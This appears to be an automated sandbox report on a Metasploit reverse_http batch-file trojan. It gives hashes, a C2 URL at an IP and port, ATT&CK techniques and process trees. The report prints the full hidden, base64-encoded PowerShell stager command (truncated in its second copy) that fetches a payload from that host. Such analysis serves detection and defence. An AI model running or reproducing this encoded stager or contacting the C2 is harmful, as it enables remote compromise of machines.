metasploit | 9b6a8e674502750d003fd795b210f842e85299e8f80484d74362152146a99570

General

Target

7337f39a5ba72a7f74cc8915d26e84b8.bat
Size

7KB
MD5

7337f39a5ba72a7f74cc8915d26e84b8
SHA1

ec768217f55dc32ccb2b6dcf82cbf0fbaa78913e
SHA256

9b6a8e674502750d003fd795b210f842e85299e8f80484d74362152146a99570
SHA512

3fe77588664ed994dd38cc4c7f8f71b64bd83de3c97b443996ee7fe3cc2cde187b42be7877908cd26aac9b058bbc2764d53bd523022aef5103deaac21f85227c
SSDEEP

192:+n2jh1hqT2BkbI5ofdiPcklcNRbJraXUjeBPjcF6hdC:+n2jh1hs+kbqoVaPlERIkSBr3hdC

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Extracted

Family

metasploit

Version

windows/reverse_http

C2

http://89.197.154.115:7700/ih4cyGecAj0duhy7eltmzQo4WCxwpVTVdgyRKZrcT-IZi-ykXLZvMxz4IGCUvaiR0wrVtAp0fWkwIACV8TVd4z2_DHbSHQVjIToJhqAol9MrnN4FksZWgFlxarU1GZ

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Blocklisted process makes network request 20 IoCs

flow	pid	Process
3	2708	powershell.exe
5	2708	powershell.exe
6	2708	powershell.exe
7	2708	powershell.exe
8	2708	powershell.exe
9	2708	powershell.exe
11	2708	powershell.exe
12	2708	powershell.exe
13	2708	powershell.exe
14	2708	powershell.exe
15	2708	powershell.exe
16	2708	powershell.exe
18	2708	powershell.exe
19	2708	powershell.exe
20	2708	powershell.exe
21	2708	powershell.exe
22	2708	powershell.exe
23	2708	powershell.exe
25	2708	powershell.exe
26	2708	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2800	powershell.exe
2708	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2800	powershell.exe
2708	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2800	powershell.exe
Token: SeDebugPrivilege	2708	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 1804 wrote to memory of 2160	1804	cmd.exe	32
PID 1804 wrote to memory of 2160	1804	cmd.exe	32
PID 1804 wrote to memory of 2160	1804	cmd.exe	32
PID 2160 wrote to memory of 2800	2160	cmd.exe	33
PID 2160 wrote to memory of 2800	2160	cmd.exe	33
PID 2160 wrote to memory of 2800	2160	cmd.exe	33
PID 2800 wrote to memory of 2708	2800	powershell.exe	34
PID 2800 wrote to memory of 2708	2800	powershell.exe	34
PID 2800 wrote to memory of 2708	2800	powershell.exe	34
PID 2800 wrote to memory of 2708	2800	powershell.exe	34

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\7337f39a5ba72a7f74cc8915d26e84b8.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEASABkADcANABXAGMAQwBBADcAVgBYAGEAMgAvAHsAMgB9AFIAaABmACsAWABxAG4ALwB3AGEAcQBRAE0AQwBvAEIAQQAwADQAMgAnACcAKwAnACcAcgBGAFMAcABOAG0AQQB3AHsAMgB9ADcAbgA1AGwAawBCAFIATgBiAEUASABlADIARABzAGMAZQB4AHgAZwBMAFQAOQA3AHoAMwBtAHMAcwBsADIAawAvAGYAZABWAGwAcABMAEsAUABiAE0AdQBUADcAbgBtAG4AVQBlAGUANQB5AHcAVwBLAEQAdAB5AFUARAA0ADQAOABjAGYAaABQAE0AegBSAFMAbQBLAEIATABHAFUAcgBxACsAcgBRAG0AbgB0AGQANQA0AHEATAA1AGUAbAA3AFMAUgBvAEUAZQBFAFgAUQBWAHcAcQBTAGQASgBsAEUAUwBMAHgANgB1AFAASABUAHAANgBtAE8ATwBhAG4ANwAxAG8AZgBjAHkAWABMAGMAUABSAEEAQwBjADcARQB7ADIAfQB2AEMAJwAnACsAJwAnAG4ANABJAFkANAB4AFYAZQBUAGgAdwAzADIAdQBQAEMASABVAFAAcQA5ADEAcQBmAHMAQQBkAEUAegAyAGEARwBEAHYAQgBBAEwAVgAwAHIAcwBGADMAYwBqADUAcQBIAEMAdABKAHEAewAxAH0AVQBNAEwARgA4AG0AKwAvAGwAUwB2AEwAcQA4AGEAcQAxAG4AdgBNAEUAYwAzAEUAcwBuAG4ASQBPAEkANQBxAFAAcQBYAGwAewAyAH0AdgBCAFgAcAAnACcAKwAnACcAVgBCAG8ASABSAEkAcwBsAGcAMwB7ADIAfQBwAFMAeABqAGEAMQA1AHoAUwBkAHgAcQAxAHUAdwAnACcAKwAnACcANABRADIAcwA4AEIAbQBsAFAAMgBNAEEAOAB7ADEAfQBIADUAVwBCAG0AOQBlAC8ARQBrAHgAegA5AFAANAA3AEYAWQBoADUAMABRAGwAbAB1AEYAMQBtAGoASgBQADgAZgAwAFUAewAxAH0AMQBtACcAJwArACcAJwA1AEsAewAyAH0AdwBMAEQAYwB2AFYANgAnACcAKwAnACcAbABkAHgAZQBWAFkALwB6ADIATgBPAEkAbAB6AFQAWQA0ADUAVABsAHAAZwA0AGYAUwBJAGUAegBtAG8ARABGAFAAcwBVAHoALwBGADYAQgBWAHcAbQBUADAAawBjAHIAQwBvAFYASQBIAHQAewAyAH0AVwB5AHkAVwA0AHAAegBTAHEAdgBCAHYAeABJAGgAagB2AEwAdQBBADkANgAxAE0ANABtAHMAbQBvAEoAcgB5AHQARgBLAEYAcQBMADcAbABxAE0ASAA4AG4ATwAnACcAKwAnACcASQBUAGEALwBrAE4AUwA0AHQAVQBxAE0AQgB6AFMAUQBkAEEAOABLACcAJwArACcAJwA4AEMAeABQAFUAbABoAGMASQA4AGYAUwBPAEQAWABnADQAdQB6AC8ASgA0AGcAOABGAGsAYwBjAG8AeQBjAHUAVAA5AFIAewAxAH0AQwBxAGcAZwBHADYARQBXAGYAcABBAFQANQBMAFYAcAByAGoAeQB1AG8AegA0AEsAQwBVAFYAYgA5AFYAVgB1AFAAQwAnACcAKwAnACcAQwBHAHkAYgB2AGQAMgBGAG8ANgBYAEQAewAyAH0ATAA5ADYARQBmAEIARgAvAEUAdABFAEgAewAyAH0AUQBGADAAZgB2AHsAMQB9ADMATQBWAHIARQB1AFAAdQBJAFUAWQBSADgAUwA0AEoASwA3ADQAVgBFADcAeQBtACsAQQBoAEkANwBVAEkAMgBCAGcAdgBGADgAdgBrAEMAKwAxADEATQBjAFkAQgA0AEEAWABLAFIARwBsACsAeAA5AFMATABDAFAALwBPACcAJwArACcAJwBxAE8AYQBFACsAVABoAFUAUAA0AHAAcQBCAFYAUgBEAHkAeQBwAGYARwBuAE8ASQBtAGwAdgBYAFkAdwBCAEcAQQBkAC8AbwB1AEYAMgBHAEMATQBzAEUAWAA2AG4ATgBwAEgAQwA3AGEAewAyAH0AMgAnACcAKwAnACcAOABnAEsAbgBjAG8AeQByAEsAcQBNAE0AMgBoAFQAcgAyAHEAWQBHAEoARQBzAFYAOABWAGwARABnAGoANQB5AHMAbAA1ACsAegA0AFcAbgA0AHgAMQA4AGcAcABKAHgANwBLACsARQBYAGMAcQB2AEkAUABPAE0AOQBxAE8AeQB6AE8AZQBKAHAANwBFAEYAYQBBAHcARABJAFQANwBCAEYARQBDADAAUwBxAHcAbwBEADQAVwBEADIAWQBKAEwAewAyAH0AbwBMADcAKwBKAFIAdwBkAFIAQwB0AFUARABrAHAANABnAEgAbgBCAFMANABHAEQAeQBJAGwAbABTAHYAMwBDAFQAVgBXAG8AbQA1AG4AcQBVAFUAQgB3AEIAeABiAEYAcgBhAEIAUQBGADAAQwBQAE8ARgBYAEwATQBMAFIAUgBnAHYALwB5AE8AbQB7ADEAfQBjADYATwBDAFYAOQBnAGMAcwBGAGsARgBkAEcAUQByAEIATgB5AG4AaABWAGMARQBqAEsAbwBRAGMAVgBHAEIAZgBwADkAUgA5AHMAKwBMAHIAMwBIAEkAMwBwAHAAUABnAGMARwB2AEYAUwBYAGsAdgAxAHcASQBzAEMASwAnACcAKwAnACcARAAxADMARQBTAHQAeQA5AEEAegBRAEUAWQA2AFUAQQB4AFIAYQB5AHsAMgB9AEkAVgB7ADEAfQBmAGgARwBQAHIAVQB7ADEAfQA4AGEAZgA2AGgARQB3AFYAZQBPADcAMQBtAEIAcgArAGMARQBzAGEAKwBnADUAKwBCAHYAeABzADAAdABKAHsAMQB9ADkANABQAC8AYQBiAGcAewAxAH0AMQBBADIAdgBrADAAMwAnACcAKwAnACcANwAyAHEAMQBDAGQAcwBIAE8AdQB4ADAAcgBuAGoALwAwAGMAZAB0ADAAewAxAH0ARwA3ADIAZABOADYAewAxAH0ASwBvAE0AewAxAH0AawBWAFEANQA5AEYAVABKAEsAdAA0AGIAUQBVAEMAawA0AEYANwB4AHgANwBQACcAJwArACcAJwBRAG8AOQBLADAARgA0ADMARwBlAHIAYQB2ADcAJwAnACsAJwAnAHcAewAxAH0AdQBJAGUAcwBrAHcANQBQAGwAdwB7ADEAfQAyAGsAdABGAHIAeQBwAEMAVgB0AEEAYgAxADcANABOAHMAQwBUADAAUgAyACsAeABHADgAUQB6ACsAZABqAEYAUQA5AFUAeQBXAGQAOQBvAGEAZAArAFkAUABiADEAQgBZAHUASABkAFIAbABMAFYAeQA3AEwARABOAHYANwByAHYAMQBlAHIAMwB0AG8ALwA0ADEAOQBSAFcAVgArAFUAMgBhAEkAMgBmAE8AcgBJAEUAWABxAGYAVwA2AFkALwBqAGMAcwBoAHQAagB5AC8ANAA1AGIAQgBWACsAVwBtADcANwBCAHIAbgA3ADcATgA2ADgAYgBZAHcAMgBTAHYAQwBwADEAdwBqAHYAZwBjAGYAdgB0ADUAOQBSAE4AdwB0AE0AOQAxAHAAYQB1AEwAdgBBAGMAcgBXAE4AMwBtAHQAYgB1AGgAWQAnACcAKwAnACcARQBoAGoAVgBmAGoAeAB1ADMAaAAwACsAbQBxAG4AbwBEAE4AVgBzADQAUAByADMAZgA4AHMAVAB2ADMARABhAE4AcgBwADAAYgBwAHIAdwBmAG0AdwBvAHoAcABkAEMAMgA3AEYAMgBtADkALwBjAEoAYQB0AHIAQgB2AE8AbABzAFUAJwAnACsAJwAnAFAATQAyADAAYgBVAEYAOQBlAEoAeAA4AHQAQwBVAG4AdwB6AEwAeQA4AGMAZABlAGEAOQByADQAMwBBAFIAYQBRAGQAawB2AHAASQB4AFUAOQBtAEUATABxADQAVABzAEIAdABzAGYAbABUAEEAYgBxAFQATwBzAEsASgAwAFcAWABmAFgAVQA1AFIATwBPADAASABkACsAUQBiAGIAbwBGAC8AUwBIAG8AMwArAHYASQBFAEcAMgA5AGIAQwAzAFUAcwBQAGQAOABuADgANABYAGwAKwBOADIAdQBGAEwAVQA5AGIAMgBFADQAMABqADcARQB6AEgATABuAHgAYwBPAE4AMABHAGsATQAzADIAbgBMACcAJwArACcAJwBzADgAbgB0AEwAUwA1AHIAVwBYAFgAZwB6ADcAdABIAEIAcgBPAEUAMAA3ADEAMQBxAEcAZwBQAC8ANABNAFIAegAxAGUAdQBxAGsAZABQAGsATABkAFAAVwB1AHMANABtAEIAQgBrAHoAQwBXACsARwA2ADMAawB2AEoATABZAFUAegBwADAAbwBHAFQAcgA5ADkAewAyAH0AJwAnACsAJwAnAGMAMAAwAE4AUwBIADUAdQA3AGEAdQBoAHYAbQAxAG0AYgBlAFIANgAwAHgAYwBwAHAAKwAvADIARQBRAFEAcQBqAHQALwBiAHoAQgBGAEwAcwBmADMAcABGAEYAdgBWADkAdgB1ADgATQA5AEgAVABPAGwATwAyAEsAaABCAG4ARgBvACsASgBZAFQAYgBWAEwASABsAEQALwBBAG4AWQB1AEMAewAxAH0ASQAxADAANQBSAG0AYwBHADgAcAA5ADEAcgBQADcAYgBPADEARQBZAFcATwBlADMAQQBDAHYAYwA0AHkAZABFAHcAVgBjAEQAYwBPAEMAWAB0AHMATgBiAEIAdgBwAGcAYQBWAEEAcgBPAGQAVABwAFMARgBQADYANAA3AFYAdQBoAHYAZgA5AEQASwBJAHIAdgBvADQANgB3AGMASwBJAEsAVQBnACsATQAwAFUAMQBVAEkAYQAyAGQAbwAvADMAOQBVAGIAQwA5AEEAdAB4ADcASABUAEQAQgBRAGQANwB1AHoARwBnAHYAVQBTAE4ASgBTAGYANgBrACcAJwArACcAJwA2AFIAcwA4ADkAeQBOAGwAQwA4AEMAYwB7ADIAfQAnACcAKwAnACcALwBvADYANAB4AFgAdAAvADAAbgB5AEMAdgBiAHUAJwAnACsAJwAnAFUASgB4AEcAVQBDAE0AVABNAHMAVwB4AHAAdABlAGgAQwBqAHoAbwBmAGIAawBVAHUAYwBDAEgAeQBFAE8AUAAwAEUAeABiAGUAMABTAGMAeABiAHoAVgBVAHAATwBFADYAbgBIADMAOABvAHIAVwBmADYAcQAvAHAANwBiAC8AWQBhAEsATQAxAEMAUgBLAEUAdQBZAGEAewAxAH0AZQB1AHEAUABHAFUAdQAwADgASgBxAGUATQBGAEIAeQB7ADIAfQBlAE4AeQA0AHQAagB7ADIAfQBOAE0AWQBVAGQAQgBiAGEAWQBTADEAdABSAEsARwBWAGUATQBhAGEATABnAFEAbwBiAHcAbQBsAHUARgAyAHUARQByAFIAOQBOAGUAdQB1AHQASQBuAHcAbQByAEwAdwBNADcAOAB2AFIAeAA0ADgATABNAEIATAA2AFYATgBGAEUAYQB7ADIAfQBNAGMAQgB6AHkAcwBTAHYAdQBXAEoATQBIAFkAbABmAGEAUwBmAEcAeABKADMAKwA1AGEAaAB5AFUASAA4AFMAewAyAH0AcwBXAGcAegB1AEEAcABxAEwAJwAnACsAJwAnAGMASABvAFUARAB2AEwASQBXAGgARABGADcANAA4AFcANwBHAGMAYwBCAHMAVwA3AGUATAAwAEgASABhAGoAZQBRAG0ATwBIAE8AWABOAHEAdAB3AFcAQQBLAG0AUAAwAE4AWAB3AG4AdgB6ADUAbgB3AG0AdgB3AEEATABVAEcAZQBMADQAcwBOAGoATgBJAEUAVwBDAC8AdwBvADkAQwB7ADIAfQBSAGQAYgB5ACsAcwB0AHEASgBTAEYAMwBlACsAYgBOAGUAZQB7ADEAfQBFAGMASQBmAC8ALwA5AGsAegBjAHYAewAxAH0ALwA3AGoAOQBwAGsAeQBTAHEAawBkAHMAdgBqAHIAOQA4AHUARABWAHMAUAAyAE8AQQBMAHsAMgB9AEkAYwBLAEEAMABZAGYAUgBSAGYARgByAEcAMwBzAFQAaABYAEMAewAyAH0AdgB3AGcAdQB4AGcAUwBwAFkAbgA1AC8AewAyAH0AWAA1AFIASgB6AHEALwBHAHMAUABBAGUAaAArAC8AZgBXAGoAKwBtAHMAUgAwAE4AQQBBAEEAewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwBaACcAJwAsACcAJwBpACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2160
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEASABkADcANABXAGMAQwBBADcAVgBYAGEAMgAvAHsAMgB9AFIAaABmACsAWABxAG4ALwB3AGEAcQBRAE0AQwBvAEIAQQAwADQAMgAnACcAKwAnACcAcgBGAFMAcABOAG0AQQB3AHsAMgB9ADcAbgA1AGwAawBCAFIATgBiAEUASABlADIARABzAGMAZQB4AHgAZwBMAFQAOQA3AHoAMwBtAHMAcwBsADIAawAvAGYAZABWAGwAcABMAEsAUABiAE0AdQBUADcAbgBtAG4AVQBlAGUANQB5AHcAVwBLAEQAdAB5AFUARAA0ADQAOABjAGYAaABQAE0AegBSAFMAbQBLAEIATABHAFUAcgBxACsAcgBRAG0AbgB0AGQANQA0AHEATAA1AGUAbAA3AFMAUgBvAEUAZQBFAFgAUQBWAHcAcQBTAGQASgBsAEUAUwBMAHgANgB1AFAASABUAHAANgBtAE8ATwBhAG4ANwAxAG8AZgBjAHkAWABMAGMAUABSAEEAQwBjADcARQB7ADIAfQB2AEMAJwAnACsAJwAnAG4ANABJAFkANAB4AFYAZQBUAGgAdwAzADIAdQBQAEMASABVAFAAcQA5ADEAcQBmAHMAQQBkAEUAegAyAGEARwBEAHYAQgBBAEwAVgAwAHIAcwBGADMAYwBqADUAcQBIAEMAdABKAHEAewAxAH0AVQBNAEwARgA4AG0AKwAvAGwAUwB2AEwAcQA4AGEAcQAxAG4AdgBNAEUAYwAzAEUAcwBuAG4ASQBPAEkANQBxAFAAcQBYAGwAewAyAH0AdgBCAFgAcAAnACcAKwAnACcAVgBCAG8ASABSAEkAcwBsAGcAMwB7ADIAfQBwAFMAeABqAGEAMQA1AHoAUwBkAHgAcQAxAHUAdwAnACcAKwAnACcANABRADIAcwA4AEIAbQBsAFAAMgBNAEEAOAB7ADEAfQBIADUAVwBCAG0AOQBlAC8ARQBrAHgAegA5AFAANAA3AEYAWQBoADUAMABRAGwAbAB1AEYAMQBtAGoASgBQADgAZgAwAFUAewAxAH0AMQBtACcAJwArACcAJwA1AEsAewAyAH0AdwBMAEQAYwB2AFYANgAnACcAKwAnACcAbABkAHgAZQBWAFkALwB6ADIATgBPAEkAbAB6AFQAWQA0ADUAVABsAHAAZwA0AGYAUwBJAGUAegBtAG8ARABGAFAAcwBVAHoALwBGADYAQgBWAHcAbQBUADAAawBjAHIAQwBvAFYASQBIAHQAewAyAH0AVwB5AHkAVwA0AHAAegBTAHEAdgBCAHYAeABJAGgAagB2AEwAdQBBADkANgAxAE0ANABtAHMAbQBvAEoAcgB5AHQARgBLAEYAcQBMADcAbABxAE0ASAA4AG4ATwAnACcAKwAnACcASQBUAGEALwBrAE4AUwA0AHQAVQBxAE0AQgB6AFMAUQBkAEEAOABLACcAJwArACcAJwA4AEMAeABQAFUAbABoAGMASQA4AGYAUwBPAEQAWABnADQAdQB6AC8ASgA0AGcAOABGAGsAYwBjAG8AeQBjAHUAVAA5AFIAewAxAH0AQwBxAGcAZwBHADYARQBXAGYAcABBAFQANQBMAFYAcAByAGoAeQB1AG8AegA0AEsAQwBVAFYAYgA5AFYAVgB1AFAAQwAnACcAKwAnACcAQwBHAHkAYgB2AGQAMgBGAG8ANgBYAEQAewAyAH0ATAA5ADYARQBmAEIARgAvAEUAdABFAEgAewAyAH0AUQBGADAAZgB2AHsAMQB9ADMATQBWAHIARQB1AFAAdQBJAFUAWQBSADgAUwA0AEoASwA3ADQAVgBFADcAeQBtACsAQQBoAEkANwBVAEkAMgBCAGcAdgBGADgAdgBrAEMAKwAxADEATQBjAFkAQgA0AEEAWABLAFIARwBsACsAeAA5AFMATABDAFAALwBPACcAJwArACcAJwBxAE8AYQBFACsAVABoAFUAUAA0AHAAcQBCAFYAUgBEAHkAeQBwAGYARwBuAE8ASQBtAGwAdgBYAFkAdwBCAEcAQQBkAC8AbwB1AEYAMgBHAEMATQBzAEUAWAA2AG4ATgBwAEgAQwA3AGEAewAyAH0AMgAnACcAKwAnACcAOABnAEsAbgBjAG8AeQByAEsAcQBNAE0AMgBoAFQAcgAyAHEAWQBHAEoARQBzAFYAOABWAGwARABnAGoANQB5AHMAbAA1ACsAegA0AFcAbgA0AHgAMQA4AGcAcABKAHgANwBLACsARQBYAGMAcQB2AEkAUABPAE0AOQBxAE8AeQB6AE8AZQBKAHAANwBFAEYAYQBBAHcARABJAFQANwBCAEYARQBDADAAUwBxAHcAbwBEADQAVwBEADIAWQBKAEwAewAyAH0AbwBMADcAKwBKAFIAdwBkAFIAQwB0AFUARABrAHAANABnAEgAbgBCAFMANABHAEQAeQBJAGwAbABTAHYAMwBDAFQAVgBXAG8AbQA1AG4AcQBVAFUAQgB3AEIAeABiAEYAcgBhAEIAUQBGADAAQwBQAE8ARgBYAEwATQBMAFIAUgBnAHYALwB5AE8AbQB7ADEAfQBjADYATwBDAFYAOQBnAGMAcwBGAGsARgBkAEcAUQByAEIATgB5AG4AaABWAGMARQBqAEsAbwBRAGMAVgBHAEIAZgBwADkAUgA5AHMAKwBMAHIAMwBIAEkAMwBwAHAAUABnAGMARwB2AEYAUwBYAGsAdgAxAHcASQBzAEMASwAnACcAKwAnACcARAAxADMARQBTAHQAeQA5AEEAegBRAEUAWQA2AFUAQQB4AFIAYQB5AHsAMgB9AEkAVgB7ADEAfQBmAGgARwBQAHIAVQB7ADEAfQA4AGEAZgA2AGgARQB3AFYAZQBPADcAMQBtAEIAcgArAGMARQBzAGEAKwBnADUAKwBCAHYAeABzADAAdABKAHsAMQB9ADkANABQAC8AYQBiAGcAewAxAH0AMQBBADIAdgBrADAAMwAnACcAKwAnACcANwAyAHEAMQBDAGQAcwBIAE8AdQB4ADAAcgBuAGoALwAwAGMAZAB0ADAAewAxAH0ARwA3ADIAZABOADYAewAxAH0ASwBvAE0AewAxAH0AawBWAFEANQA5AEYAVABKAEsAdAA0AGIAUQBVAEMAawA0AEYANwB4AHgANwBQACcAJwArACcAJwBRAG8AOQBLADAARgA0ADMARwBlAHIAYQB2ADcAJwAnACsAJwAnAHcAewAxAH0AdQBJAGUAcwBrAHcANQBQAGwAdwB7ADEAfQAyAGsAdABGAHIAeQBwAEMAVgB0AEEAYgAxADcANABOAHMAQwBUADAAUgAyACsAeABHADgAUQB6ACsAZABqAEYAUQA5AFUAeQBXAGQAOQBvAGEAZAArAFkAUABiADEAQgBZAHUASABkAFIAbABMAFYAeQA3AEwARABOAHYANwByAHYAMQBlAHIAMwB0AG8ALwA0ADEAOQBSAFcAVgArAFUAMgBhAEkAMgBmAE8AcgBJAEUAWABxAGYAVwA2AFkALwBqAGMAcwBoAHQAagB5AC8ANAA1AGIAQgBWACsAVwBtADcANwBCAHIAbgA3ADcATgA2ADgAYgBZAHcAMgBTAHYAQwBwADEAdwBqAHYAZwBjAGYAdgB0ADUAOQBSAE4AdwB0AE0AOQAxAHAAYQB1AEwAdgBBAGMAcgBXAE4AMwBtAHQAYgB1AGgAWQAnACcAKwAnACcARQBoAGoAVgBmAGoAeAB1ADMAaAAwACsAbQBxAG4AbwBEAE4AVgBzADQAUAByADMAZgA4AHMAVAB2ADMARABhAE4AcgBwADAAYgBwAHIAdwBmAG0AdwBvAHoAcABkAEMAMgA3AEYAMgBtADkALwBjAEoAYQB0AHIAQgB2AE8AbABzAFUAJwAnACsAJwAnAFAATQAyADAAYgBVAEYAOQBlAEoAeAA4AHQAQwBVAG4AdwB6AEwAeQA4AGMAZABlAGEAOQByADQAMwBBAFIAYQBRAGQAawB2AHAASQB4AFUAOQBtAEUATABxADQAVABzAEIAdABzAGYAbABUAEEAYgBxAFQATwBzAEsASgAwAFcAWABmAFgAVQA1AFIATwBPADAASABkACsAUQBiAGIAbwBGAC8AUwBIAG8AMwArAHYASQBFAEcAMgA5AGIAQwAzAFUAcwBQAGQAOABuADgANABYAGwAKwBOADIAdQBGAEwAVQA5AGIAMgBFADQAMABqADcARQB6AEgATABuAHgAYwBPAE4AMABHAGsATQAzADIAbgBMACcAJwArACcAJwBzADgAbgB0AEwAUwA1AHIAVwBYAFgAZwB6ADcAdABIAEIAcgBPAEUAMAA3ADEAMQBxAEcAZwBQAC8ANABNAFIAegAxAGUAdQBxAGsAZABQAGsATABkAFAAVwB1AHMANABtAEIAQgBrAHoAQwBXACsARwA2ADMAawB2AEoATABZAFUAegBwADAAbwBHAFQAcgA5ADkAewAyAH0AJwAnACsAJwAnAGMAMAAwAE4AUwBIADUAdQA3AGEAdQBoAHYAbQAxAG0AYgBlAFIANgAwAHgAYwBwAHAAKwAvADIARQBRAFEAcQBqAHQALwBiAHoAQgBGAEwAcwBmADMAcABGAEYAdgBWADkAdgB1ADgATQA5AEgAVABPAGwATwAyAEsAaABCAG4ARgBvACsASgBZAFQAYgBWAEwASABsAEQALwBBAG4AWQB1AEMAewAxAH0ASQAxADAANQBSAG0AYwBHADgAcAA5ADEAcgBQADcAYgBPADEARQBZAFcATwBlADMAQQBDAHYAYwA0AHkAZABFAHcAVgBjAEQAYwBPAEMAWAB0AHMATgBiAEIAdgBwAGcAYQBWAEEAcgBPAGQAVABwAFMARgBQADYANAA3AFYAdQBoAHYAZgA5AEQASwBJAHIAdgBvADQANgB3AGMASwBJAEsAVQBnACsATQAwAFUAMQBVAEkAYQAyAGQAbwAvADMAOQBVAGIAQwA5AEEAdAB4ADcASABUA